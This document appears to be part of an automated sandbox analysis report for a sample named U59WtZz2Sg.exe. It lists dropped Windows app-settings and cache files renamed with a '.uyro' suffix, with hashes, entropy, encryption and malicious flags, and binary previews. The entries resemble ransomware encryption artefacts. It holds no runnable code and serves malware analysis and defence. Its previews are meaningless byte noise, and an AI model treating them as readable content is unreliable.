C:\Users\user\Local Settings\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974975996164974
Encrypted:	false
SSDEEP:	192:gL2VKO/tlMEB18VJQXBsvELSL1fF5PG+SO4Idh9FimVd+BZuv5:gKjhB6QXpGBrzHFRd68
MD5:	AF01FBBB2DCC64EBBC126FD416D73AAF
SHA1:	53266A127055C2DDDA5C913580C635BEFABAB95F
SHA-256:	C600F8400E2E38549F446C3657ED9EC4BB9965D389125D93984B5D8410B96596
SHA-512:	BE8593C0F3B00632558503E541CEBEBCCB5AD15CD2B0721778FC5C2FE71A5462E919A850F6E0674AE65ACB2FFCDA640156ABA7182611038CC96A4B17E87A8F0D
Malicious:	false
Reputation:	unknown
Preview:	regf..63..%....+)_.....wB..5....A._...u`..5..Z.ty..2.g...1.....M." rA(.l#L&..u..m.]H...HW..=...7...a."_0...x~.l.O...Py.L.,.6.+}%{.y....H.H@.?......4U..^.Cm,.........T.iq..}......._3.t.!.e.L.gn.......&..!&.....=..4...)..H..@GB..FG..z.1<.......m.....E.....=.h.Ws....P..7.}."T?1~B%.....~u.. ...Q....4...3.....O.........mi....B$#...C._...5.\|..r...n..m7R..:.).m..X..} ..x...5K.._.......sK..l<.7....W.u......:4.%mV2A.'...k...(D......~v.J.~.I..?.U!7....v...lS..pf.=...y.X....\..en..=...K.;.......W.^2..#..i...s.....s5V.0`0`..k'.I.....X.2V....y..l.{..`.,..!m.v.-}....P....![..?..n!._.r%D.@Z.s!.N...FK.2>..+.#2.0...a.q..O......I...........y..1&.9...%......J.V..........P...T.A_..j../.......R.QCc..>...7NP.;.oX....D........b./.\.M..Xf...{s....U<'P.(......p...{.B....u.....{..J.T..S.7...!....>t...r..~.p.D.${.?.K.t.m.\|..:...X...+6s.l.lJ...FR.N.9.q..Qi,qt.B.9.2..Z.Y.0&......... r..,$vW%.....,I.....\.3..S..2.h..=C.2r..#).m.@`.'......B.k$:n...:.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980745826791777
Encrypted:	false
SSDEEP:	192:ksYdWrW4jZvT8tcpuCD6mpHifAPKSqt+KwAwhUT/Hj0jmFqSKKe:kndWrWeZ78tcUCDnpHiUAt9wAwuzjjIF
MD5:	C10B962780888DA00FA94155C4890BAD
SHA1:	36D0A70A034AC516D2051BEA79DC5AA9556C8B2A
SHA-256:	92D357D0A7A07DA71ABA5654FF7055D0FE552AF79B473BDD29010FC5972836DA
SHA-512:	43D7A1F9D59658AAC470B5E988C934CFB61BB20AF45C7ED59E14A1A187D165941966789255DE2E99EA64BE082E689ADADD55995FB1752452611C9F53F3A60564
Malicious:	false
Reputation:	unknown
Preview:	regf.A.......0.,.V. .......(.Cn..,.=...q..Nq..pL...:S..F...]..#....8.U......!....9..;o!...p.1{...........+V.0.......m..4.....O..@..~[,.)Q.'......./;4.@:)G.L.....Mt {.lH.6.Y..Y.....J....y.......G.p...p...=]..,..M{.~...`p....X.{0.....2.%).M<\q.f..0R.V...U.p.yb@..o...i0.I"..S.........l...C.7.H.8 .K..e..bO.z....."..,l.\|.....~.....R..2..f!..c...:....3.6..E.dB...#.C..6@~..1lS.oxT..l.....\|..[.D..8>.T..3\|.....L...q0...j.k@.9...:.q...jsr.y...pW..K...F........h...\|..T..f...aI-bW..qG....Ha.......\|o....A..k.e...>%..6..c.0..T.T}.....;...8........K.`..q...R \|...+..1$D.X. ..O......o..r....A.j...u.F`..... 6\.x1..o.#.E....9.w.Z.=.KF.:.......1..yY..~...J.......`.......".~..J..V..H..t...".........-I1t../....z..3..E.s_.?.W...+...Op.y.-w1.^~&}d~..?.Z ...U.:-...n.LF..m.oq.........d..9a...).....\|$.8..~..i.[.LIgH..<!..o..s.........Q..!_ls.........`...2.....qp<q........u.do...%v.v.L.U^.1j.[...qH.O..Z.j........u...gO..._....$.#...5..K..#.BV.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976125434496166
Encrypted:	false
SSDEEP:	192:hn427Sl3bnz4wbpcLVZldqevWm9Odalv6T0Nfddf+ESt:hnDSNCLVZ28Wm9sK6gjd8
MD5:	F1100EC693A62F6CA24AD3863A52844C
SHA1:	C12B4365D9540F017F271950FB8D2D1600A72BEC
SHA-256:	294CF9A3F33B215DC75AF121B24575E741CF7E9F832BA913A5EBA062FBD88BD8
SHA-512:	16D70D3358E865294B175BB9449BDAD8EFDBF60790F43B3230CEF633092F8B0276A42A65F39E49E8A985AF9B473F18A4AF17C4137685D898842AC83AFA506CDE
Malicious:	false
Reputation:	unknown
Preview:	regf...^.t....$4...;...B..........2...{.~....L4..y....3.6....."-.(>..J....u5.@...jL...1.[V.B<......w#...Y.\..[>..1.....G...Q.,.nC..9iu....q...).......u.g.....G.......5Q....V...:z....\|........5..c..X.k..l!..n......G`..........@...Iu.Q.?...^.".....Z..5....F.&...F?W...U.RY....g]......3...>.&&.b..........L....... rw..v}.Hp.4$G`P.4.:\...4.o...9MbZ...L.m..u...8..,.+..s.......T.....Zp...kE=g.;m.w..}...Sc....eF.\4.&..D....Z...,G..Ig.{....Y..d8.4&V.@Y..@`...H......b.4............#<p. ..9PF..p@..z.{4.;.n..^Sw....$+..V.c...&H........3......Cv.!%q....^.......2.......c.e..u1\G.Z..-Sr..#.....-......>eM....Q...._.B..m..F...'.Z1..._..fP...l..E.\|.........<&O[.2m..^./.L..^.9.M...pLTZm...oe..y.Y....w..rY.5?........O......8bi...HK.A..y......b.......E.t.pj.".ft...#%{Ave..........q......t..R$!.......K.l......f..}...}.x.\|.....#..+'.=~.A&A..b..E......4...E.G.4.../7.0v.*VC....QJA1.2..,...2...u]..b....!NY..........U.a...F.6><..0T.O.z....L....O..JVShc .a.7t5.N..'..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978978831744669
Encrypted:	false
SSDEEP:	192:kXckmqT1xpx44BkIZ7FKV/QBjd+v8jLYg7lud:kXX9x44BkIZ7RBov8jLY8w
MD5:	30C03440A764B67AD58B794101C62111
SHA1:	F774D95496EAF6D96BC13E6166A47F47ECC6A1C0
SHA-256:	6EEAAF22D0A33C8DEA0660F9F0249B383F88B9A74EBB0199529068CEFC5D83EB
SHA-512:	8833528364A41B511EEF05CC98C785F8E4BBC032F597CDFB829DDA3DCFA51E378E89F8280DECD0A50A8F3B74E85066C6935FB277B6F1E7C370601A7CF42973FF
Malicious:	false
Reputation:	unknown
Preview:	regf.0.b..K=..M.....W.?-h...W......eo.8S....",L..,.....T-...1...].M..{X..+.g;........2/.....pcW....v..&..:........c.G..\|]_t...EL...lx......c..h}...'.....$...d=..n.R....0+..%..D3G....5.{)L3...B..b.@d...4.p...Kk}K..L....[.....vL.S...V.7)G..3...!.F[...RVt.$...."j%.H\.G....I...H..7..fnj]..!..+.2\|..vH..(uN.1I9~....&.MFO....M.4f._A...5.V.....e.M....T...~,F.;....g...!..u\|...... ..s..RD.#.m.kW.n.o....1.a..n...W....".]Q..b.\|w.y.NX." .,<..m....t..yXYs..{.m...;4....r..H?4.I....%.;...-7..C.....7.G.G.._..$7.`.%...#.....k.g..<k.U.=1e....S..#H,<.?...H..a..uA....e....9.\F.(..H.m..:J.l@....i.....+.Kl!U.....$Sp.3..].....`.]>2..I....5.......F,?.....U..dr.}.....C...E..a.pC...H<e..PwJ=.{.....K..w..v...'.=.%Fj..R.i~.....Z...d..V..L...$..ms.5.....l9D.........u.2H[$.8.PW.i8.>...]..t.G.e"...#.%....[..\|..{.Y..b.....H.g`..E..q.....(...X.=P..q...^.......z./!..Q`p.....7n.........W.5..k.....eM.f.;.{W5....N...ua.....:VQ.K...}.M.%.2...\.7sM...f..1.4.r'..... .

C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	74062
Entropy (8bit):	7.997457265178655
Encrypted:	true
SSDEEP:	1536:DbCLrMcU3a/4WsMjbBMvZD9oR6u/D6998MQrox6sspCB8fpcoQlr61k:DbCLrFUqQWpqXo8mu6zeUpjMG1k
MD5:	D5909C2A4D65D1D2876DF5E12C5CB5B6
SHA1:	DF07653E7D07C26DFB7DFDE12C17C705FF76287A
SHA-256:	1A0759FF4EE8DDA0470F283F0B9A721CFBE37EA6FA7653423FFAEF2250591B74
SHA-512:	2C63016986F7E735259E2453EC451C7010F913F55BCA038629E4F1EE28AC41A707AFF6598A7ED6AE47B242A4D77A23DE3C7632B2D852837CEC75C6D0AD311B55
Malicious:	true
Reputation:	unknown
Preview:	regf".K5.>._DE3...%2.M@...b...r.pS...xz....u"/...3........,....e...^..pZV?./i.j..%+a..JXn......Y$f6y..R.d6M...2`...:.o..y..%...8N?k.&L]w..2.{mD.H]...'.I.X.....G)...%..x.r.n,..N..`...U._[.G..C.%.O......(.?....92f[..:...TZ.`6j.p....6..Q..3.e...l.r....8Y..wYr.,....D........x....7.>...UU.',{....E...k.......c.......H].Y..9....8..f...;8.q.=.n....\Y..F.A.86....1.....K".dS...4[".v=<y.....u5...b.........S?U/..]{.$O.E2..\.=.`.5..m....ue.vC..0i..G.R.a.CM....b...0.~...&I.r>}.h1..w.4..>....W...T$Uc.sV.I...C..\|e.xO.~..N....&..}C..)jL....vs.5..gc..z.....&.-.....a....d7.I(..U.z-r../....W..S...U.f.n.]....L....q=;@:F....z..%.Eg....S~.i+..7V.]...M...E?..&.~..ZTJ..`.7h..o ..\.)7.z..H.....iA.U.:.....T..%..).....a.\P..-....._,...j..t..g.~.....p.Nc9y...w....o\...3..V...r...a..y...7..j,t...c>-..x.tC9.\m$..y_..%..g.JO;.'.0..*j.'.ZA...K&.....6....$.f....].`.y....e._{.y....8.....#A..e._V.Iu.W............a..,.XJ.%[..A.Q...(Z....0U...d.1.V.L.....x...%)<...b.)...y8~].k

C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.997255861088143
Encrypted:	true
SSDEEP:	1536:dImUVymSmvZ66SK6XvKxQV1ARyeg+kbFkR0NgYs2fUKTmSfm:imU8mDh6nK6XvKxQVuR5RHQgJ2fJHm
MD5:	8DCFA8C634F8D7EDDD468F793986B59D
SHA1:	CCCF9D1A2F9EC630C2072656C5882B3DCBA699B5
SHA-256:	A09656A0A71B0CF48BB21FA389A4BD28DD57A7478F31D86FDDA0A960AD1D8790
SHA-512:	FF622148874F95770E5290A2E6934BEF7E68E74A9A8219F5D7D8429CB74FE13D09C22D832E11C9DC7035ECD95CAD73235AEF77214E0FE32498FB4FD8DF44ADC7
Malicious:	true
Reputation:	unknown
Preview:	regf#...n~.9.f.U...6m'..a3ZMb...._..#..7....w.1L.\|4.X...n... ..}.c2L.BT'.....i..D:..w..%G..89n.E..a...9.)....m.tre7..83a...n.Zz...G.3......D...OI6X..+c....AI.s...%.1..s.oF.z.R.lE.8...s.......@.z..Ou)Z.wX.........&..M{^e...>..h._z.....,.......&".V6H..U..K.H6..X`n....S..R\Q.!_{{M...X..RfC.9...g.-N..oS.....=....`..<..w.)..V.(.^.BN...acE.L../...,,R....9...M.\|NS2\F"....Dpw.5.V.5..?....n.F.#.Rvd?.....~....z..H..$f.w..w.}i./T.?.h......,..ME-t.!+.7...........'......@.Lk.3..a.".h..2#.3..5Zrp...e....\|_X.,Sx...P...._.z.."......l..R.<]..V..S,9a...v....p...?..Ah..g..B......jJ....X.Yses..y",b..1.....MR.{:U[.a...-.k..{_;...F..u.....L....yW..US...?..$......i."....(.FY.RM.....0.?.`.mg@...&.i.xdrv.....a&1.{..~v.{....f.:N..o..Fr....P.....A)..KD.v.9<..:Gj..!......n..V.R>.Ol&'mJ,.%P.JG+Z.JJ.u..B....b..._.T/Y....p.....t.$...GV.@!w.s2Z..../vJs..>..D1...\|H......,&.D..`....F7....ur...".r.:I..mc..W,n..%. .w<.....l.h... ....j...N.f.+.....(..D......S.n._.EF.C

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	69689
Entropy (8bit):	7.997797454963391
Encrypted:	true
SSDEEP:	1536:zu3zkvgzEkva+vvm2h6psRgSVbUccG11xGwSGmQkzieJUPA6m:YzmmFyqm2h6psRgMUXGlLSGXkzX1
MD5:	66AC2493FFEB39BD31C42993A92185F3
SHA1:	3FA80D3942FEEAF5354DD567D45A87D684A2C68B
SHA-256:	795D64071556C82A56C9744D9205BE47DA9573E718AFDC22FFCE7B9F33C41869
SHA-512:	2859513D566BF677154832720BC470A8C811F10131B1A1F096157CA662840AD0A69007B61E2FE173340B38F1578BF2BF359ACB51AD6B15D0530CCFA58B6FE066
Malicious:	true
Reputation:	unknown
Preview:	...w.28-.+.f.p...5..9......0......@.:...Gr.i...h^Z..80.A...^..gj.M..H'>.e@..d,..a\.m..=q#.....:..k...1.....r.....^..s..c.Y;...<K....MX....66...}.G.)!#=.^.m..o.h.Gi....:P;......Fr)..\|..#.k..\|p.sS'..,....,ng.3{....h......._.<.l...q...T.....'....z.U..[.v,#x2.J ..../........E.dK.....(....//.9....,....Q..A.A..t._.V..zNY.L...`.ts..O.Q.......C...pP.YU.TtF.L..V.z.y..n.O."....k.i:+.......`2.`z.[...6..`...b!ur..[....ogi&%-.....3UU...W..v4^7..6.....\x.X..LG}R.U..y.o3..B.\.M7..D...C.R1B.=.K.:b.B..`.2.(../...B..Q}..}..."k...x....s.1.......0...2S..<..!+.WP.W.O7{Jx.p.=...N....b.}-!.;f%...w..wA.......V.........~.}........U.1.n........)/5.j..%.........p...O.....g.g;.sf..`...R...(>...Wk.c.../...A^.C.,.4KG3^..a=<!..t3.....?..i..6.(.%Ww.b:s.o.:V.DCV.-.9].h@y._."...o...#.k>qi$...$......2m.+9.$=%>Q.>,Me.!..O...K...t.po..h.............g.x.3........%.3.4.w.TVx.h(C...\....-.T...yT.r.,m.=S._....7..L.\|].....l......{.t....mU.8".+..5.h..&....+..S..%s.....xM.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977020670381337
Encrypted:	false
SSDEEP:	192:gx1DzC/YetEBg3pOj817y2Qlh3qyK8O3ePxPm7:gxuttEaOj817xw3v6oxw
MD5:	A48054BBE26E4F428EF93F8FD3552D75
SHA1:	448125918D8828A7F2170954490E45C6CCE29C1D
SHA-256:	A43E983BD1F56123BEDE44C2D8C2174BD516531622A6B35DA8B510D260CF849E
SHA-512:	BBD73A2F2F6618233B0948972A4F5BAA71FF4D79E64240A4CFB758CC712068549F46177DD0978F54BF0B062CC4295C5CB47FBC2AAC207A12C86FFB543CCA71CA
Malicious:	false
Reputation:	unknown
Preview:	regf....oBF.........ZJq6/.... qO.6.+.%..C@...'H."oL..:H.M......../.7M...S$,D.&.....]...x..i...F....&.U.;.K..OZ.Vf....y.oz....s..jtK....y,...oZa.~C&Y...e.B7..#Z5{{o.\j..cw.d.,.~9.h.l..U..W..m.r.G..\V.I^...`.e.u.H....tT...F...\....%....,B]i..n699...v/{.$...tD8......+......p.OxdR^.?..K.u...$.5.j..\.G.?V.....m.'@">.....L.4.k..oqn..$...@.5:I....N...p.^....YS...]..a7.xIx^.V..p.E....x@.....3.f]..K&G]....;0..JU...a.....7....D....}...._. ..r'.......2...@.gL.,u.`..K....t.\|jC.X{.Q.G.4.U..0\..:t5..XK).f ....s...`V......w._".:.X...4.._....D.....Tz.b..x...i.v.'_y{lT..\yCX2!.a......T...n...j.Pm..V..4...F.(..'.../PQ.U..Q.zh..Q.[..8..E.3K...FC.....\..1..3Z....X...m...,..!..\H..0.cMj.4+..H...?..=.q.(.=........g.....$.o^.....`./.\.E..?..[f.....Y2.p.v&.t....f........#......H..:W^`\|.C.d...n.`ddW..}.5H..d.Y..9....y...];x....$].2>......Z.S\|.;k..:.T..Z./....i.. .e.....?.F.n!$....Y..B.P.@..Q...d..B.;..v..QX.@.........!6=......%..'..,. ...........\.v.B..?)m.;+.U.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978975166006346
Encrypted:	false
SSDEEP:	192:NRhG4Cv3GQUot2BfVM6ZdYvW2hTxo72DD8t6HDIcTy:NnGtvrrt+fW6ZaVo7t0HDIcTy
MD5:	8A13BC50C0A6BD70E240C4255A9E9197
SHA1:	9A84019AD3BF398A910DD1F287BC96A39A891FBC
SHA-256:	2288E9D0CFED40B9FB2FC3915F4BBAE198D219A685FA6B099981A0C41C30E1BD
SHA-512:	8A8D705B56FCB0AA321F206D4952CD136379FDFE8FE93BCBF56F661A3F7643AF3B92B691B850F1536BDED44401D923ACC059C100AFE1ADDA80F192882D73861A
Malicious:	false
Reputation:	unknown
Preview:	regf.+xA.Y5.:.\....d.}7.....]^r.x......8D.."...:~.<L.=...'..[.bp\B.v....Ut.=..-0....B.-..V..;._.bg#.....V. .$.6]?:p..\T?.(G...@n........;_M..~[.FzDZ.J.kI..2?...aQ.h.H....Z\|.k.%...^..NT....6.z....l..T..].X.}.K....(IG.'3...5.6.1#...!x..y...$..t....^]V.j.q..$'....a.Y..#...mlW'...Eo.=..u{....5'.%...2......`vrx.',..P...W..'.i.7....{....../........S.)..(a...@...v.H......~c.Q......KZK..~......D].=.-..H..k{..T.7.F.....'...[."a].....N..<.Q.H?T.....2V...L...?w..Z..].../....%.X\t4B..s;U(8^..]...P.A...TJ.m.kB.X.G...}m_..`.W7IT.8.w.....D"eu.....)'......o....1....b...-...X;..._]`..D......XP ...7.cJ.....TEj.P\.T..G...O........G.E.p..<Gx.u..NA.......Htt.<...z....7gY..^.w........r.M...L....".O..~..........[...v.Kj.r...>..d.k..........P......@..q...H.w..;.{.%..3...j....4.2@...GS....{.%..>.vQW.q(...&x..A.".#.`.c..M[.OU%..M....'.E......2j.\...Bt......Q.X...t...&._..J......)K.Xu..n...u...+....Dr..#Rj..^.Yy.I..Z....'s.G..>N8~.J..)....}MT"....+....p.q).E.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980648632040737
Encrypted:	false
SSDEEP:	192:oF+aXcPVwpgaas6fOjBneWaA198ZODdG2f76f6ebvA:F6cPVwpgA62jBeQ8ZOjWbvA
MD5:	3F5E5A00806A10F8A1F2D46429DE99A0
SHA1:	B53D41B2AB3E40D7ED5D689EDE7F5906AE3CF2E5
SHA-256:	24A4B95EE8FDFCDCAFCBE90954722FEE2261C6543C64D8C212976071978CE736
SHA-512:	D744E78AB5D844533016044FFDAFB87757515181AE382BDD39DA30A1BEF1FD1C20EA9D219F3ABAD7FD765431714E7D0CE4B630F44AB0F849D03499E7926380CF
Malicious:	false
Reputation:	unknown
Preview:	regf..9]Y.m..T...y...B;@......R.4.e.<...2Z....N.I..$..#.......k...f.P..3+..q.D.^..C....',s-.....hB.@.'..k.g=".\..8.2.Nw....lX...bqu...(..Xw...'..D{.rS..L..........P..Tw...............V..x._kaC......h.....4mz6...Nd.K..y.1.y.].}....R.').......b...}8R_@....z.>..o..r.E.6.'..:.8..c.S@O.....O.d..._.;..L...7.p...u..H.#.Z.....M.Ol..Q.....0......l.6.u`..u.k...xT..'.gH_HW..?.HF...>....X....<[..4..!'.......yE/;>%....u....VLl;..5W)K.6.Ep.s.@b.....g..Pa......9Ivq.V.Z..o..>i...r... .,.7..;..#.j...Z.F....$..\|KX...~.....%.}...9l...?83.....l)K.".J..(..b9cVu.\|W..u_..&..O..>.A?..<....n.+.DDk6\.F.....kv\....j ...K).;.3U...S..c{...$.`..?.2L.k/.._.3fG.....M....}..ug......c.XJ.(}U.i.....K......$5......aq.x..M.^... ..E./..;...O....&k>i.`Kv....2......{.l.^.4.2..\|..h.pDp.&f.".tO..D`..u..c.5..c.!.....;C.]M...\|...P.._>...-..83...............i.T....hbhF,..O.Qi..e.6.$.j).4... ..[.$....w..m,..S..9..p.......w..65....U....QzO5...).lVM....}=.`3.,.nL...Y..%x..\..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979114892546861
Encrypted:	false
SSDEEP:	192:BOo3+JI0/JPfwkJHTdI1QzEL+h+zVCmjnpjdePJ83I:BTc5JHTa1DL+yjnpjOJ83I
MD5:	5C14D8C17641C7A12103919C38C09DB5
SHA1:	1FED22E1E8FB833DE972E2083808E2F7D3B60D5B
SHA-256:	8DE016EBA8ED5152CE2D93F2A5DD72D338115137303CC646C319DFCEDDCB6F6E
SHA-512:	DE58E71D674B76878A8684D36A58DF16EC93D27ED640796BAD64F8E1EEA4719BB6970668C9D10BC5FB14DF7287C7260599560E19E297CF430DD249F1462347FA
Malicious:	false
Reputation:	unknown
Preview:	regf...]..H.\.DT..l.........P....K....W.4+:H...7a..5.w.Z.......>s..{....+g..M.9.h_........p....yR..v.....C?........N........A......._.MIK.@..N.M.]....Q.....).R....{{..D6Vt$.s.=Wy.....'\|.Z~..X!..l..G3.\v...&.+1-.#.di%^K..I..gF..{..$....j......#..K.&.M.,.gf.D...>.,.4..:...J...."U'\|._.X.\|.u.D.<...g..\|..,..D.$.q.../8....DS.."".(I.GB..u.Ow......[..O...SB.i.c..X........8...i,.n.F..L..Zd....f.....p......!./[....Q.c.<.j LuIc.>]..7..W.K...)"]].../.\3..o../....Ey..!.>s%.T...+.b..M.b'Z.l...!..y.S?a.1..<...:.."c....m[iJj.%.. .^...7ZM.....h..L....)..o4..[x.[..........ol%.<..[q...N.....W....B.f...@...#.......L..C.....NE...AL.e...Pf.....:..g...q..b.+J.`[..1..d...;.>AT........._I..R..B.f...l.......;Ur7....c......d.G~`....M!...c.+9....iy...J.!(}...i.z..N....T.6.g..1.S..`.#.L,P.d.F....}.E.>.;.N.n.[.V3...K.>Z.$...D.<9..0e..D.siz].-nn...Y...~.....oP...G...u.,..+7..N.. ...X......N.. P.K.\(.....u@.5.p.....A.\|b%.AS...X.['.Z.. .>$.d?.............S....+{.>.\..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978134189734821
Encrypted:	false
SSDEEP:	192:bGp7tNrgw3cHRSE5E4Hi6Z9AAWAKkU4ncJol9:c77rgw3cxSKTCPoU4cY9
MD5:	5B3B878C7A4512F46960FE9919BA170F
SHA1:	535AC7B62CE0070D1ABDAC94FE407DA4DFB4FA58
SHA-256:	F9EAE77FDDAFD21E275A30F274168D93D86F135743E5C89E9C89A92CC758CFA8
SHA-512:	7BE1E809F31DFEB3E7B35F4658E41EDDC092E7F35A2337580221D62D68BA921A723CDAE0559FADD88952596A9FA5F879CD619ECD995E2F22C1F3E756D40B5511
Malicious:	false
Reputation:	unknown
Preview:	regf......,...q.(..)...}..V.j....-?...=.~.\......%.......o.5.J.D.....?d...t...0S..C.e..w.>.{.m.5...\tR.+3...w...MY.-..c#y..]@BPb#..z.._T...l.2.......;.JO.a>....;.\.%r.pQT+............s.....wmvI]#."M.$.......^l..ZB9.B..E....#..=)UU..u.#...:.B`...T.g_..;}.D..^-..2......(Y`z.v.8WY-.....g\zsr.R..l..{r..Fc..VL!....U....x..y\|....%..;.:.Vd1!..5j..i.:..$....yYb..8..2......).,9\.T..<....P...P;.]...\|Dk........1......".)...P.......e...H7q.. ...e...Z....x.]X8.....p;..[.."..Wo...=*`...?jk"....).T.u.dr.w.....Y..{.{.r..2.."8.....DN.......o...&,+.J.J.o..2..]........vrK.G.7...S...e.Xu....n1.s..l...L.H}...e...$.~L!....!)5..,v....S..k`..D.R...Hv.../....SN.g.+....-.{.p.....U..)...W.....r..^.k&.......3..dE...3....Zh9..7.=../..{...`.k.!.Hd.c.<...].P.{.:....n.Y..t.o.Je.;.f..5....[.....a..r.s.&>I.-.. .`R.r......5.b=...S..GR..H.......M.c...U.....Ie..y.<.9.s.7@.6.L.g.iL..D......c....a."y..S.,.....l.A;.L&.wc..>.....j.....3O....~L.oP...E....>Z.s\|.#.z..t:.....6e....

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	33102
Entropy (8bit):	7.993304220398646
Encrypted:	true
SSDEEP:	768:AutqHA0qee+29ERsyAmT5h9C7LUz7KP4oAZWTeoiQFBeGR4W:Bn0qk29EQOh9CMz7YuseRQPCW
MD5:	3BA5E673020B8BD6E71B1B51736CF533
SHA1:	A36435E01A6C3A5178FF129E658E8E43A4B0CB3F
SHA-256:	56C7C3D828875483A8CE247AE7CB09733EA2F3C661BA6BF8DEC5B6FE5CC3E14F
SHA-512:	44EFE89B944F16F6E96BCC44913B7B2F23F86053D4B766BBC93AB08873EABF9A30ECC95F7E91566A02B98457601134DC1559B16DE0E1453588A74F4FB6FC838E
Malicious:	true
Reputation:	unknown
Preview:	..-......9....Dpe..p.B;.g..0.s...\....L...b.d..c._.8Eh../}....h$......z.VdC..H..p....b.^A.b...3...C,.I.'M4P....e...7.Y$.u`3....L..=4.T:..{3V..\|.P_.I....X..E.4.3Ay..~,/.6.i...z....U1j.....t.M..........a.....W.5QM.N&3...Z.>'.@{.F.,...E.....dM<:U...i._.i.,.~..y@c&a........zLB(.'f..?.B=..G5[..B.a......u....g.....Ye...u.U......N..l...3..&AA...._...m0.].\..".@1Q.j..d.$...._...4....S#.s.}U0J.Q....[kJ2.F.......M.i...V<.l.U../...y...6......1. b.b......%....3....^tv.H.N.2..P..0K.Nr..sJ0....D.I.I...W....K...........N...c.j.I........%..G....A...;......&.(.>......n?l...tqO.i.5..W..3.../..0.....3.....D.[.:Y.w,....._..bA......x....KC %D5`2.+.6...^K.p..'.)..o....ztU.)xm....jr..i...... ..Y9,......~.....-+..;.>O.\.E......a'Y.Z"^b..o.=Nq.4.....hX....>..>.8.I..`...DF....g..BL.5..`.D^N....@..2.K........N]S.]....f\|.HJ$P..(../b-<1.@..'c.;6.B.$ 3c.?".UU.R.z.k.M...k.?..Xkm.......y.W...P..[.V.0.{...#.c.^.G.3tF.lF.!r6'u*.'.#........!..?.X.2.A.\|.P.).....3\k^9.T..

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SQLite Write-Ahead Log, version 14580171
Category:	dropped
Size (bytes):	750206
Entropy (8bit):	2.8242795656624473
Encrypted:	false
SSDEEP:	3072:zSmvB+kJ1PnlxQOWf3e8efNJ47uM/9otFVBCK+ggoF+2SONaYRsn2plY:zXBn19CBO8IN6b8VBLVSsaYC2plY
MD5:	D30A5AA86D9918418747E2F4D4188280
SHA1:	845CF7298BEF478DE74311C06E8A77C23C910155
SHA-256:	DB919237EC2FA8D4F7C9EED1C543551729F645A9C35CD022AC7625C9AD9DF146
SHA-512:	7CBA2A76A31C99930459A3CFF50D1F2676543DA4E92F1A5407D8855078BFBE505059CF65D4F22CD98A684E2101A447B4D5D1AB40F7DA05A5133A7580D4251AFE
Malicious:	false
Reputation:	unknown
